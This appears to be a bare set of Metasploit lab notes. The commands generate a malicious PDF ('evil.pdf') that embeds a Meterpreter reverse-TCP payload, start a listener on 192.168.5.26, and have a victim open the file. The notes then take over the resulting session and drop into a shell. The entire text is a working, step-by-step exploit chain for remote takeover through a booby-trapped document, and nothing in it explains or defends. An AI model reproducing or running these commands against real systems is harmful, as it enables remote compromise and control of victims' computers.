use exploit/windows/fileformat/adobe_pdf_embedded_exe
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.5.26
exploit
(/root/.msf4/local/evil.pdf)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set lhost 192.168.5.26
exploit -j
open evil.pdf at Victim (Only early version)
sessions
sessions -i 1
sysinfo
shell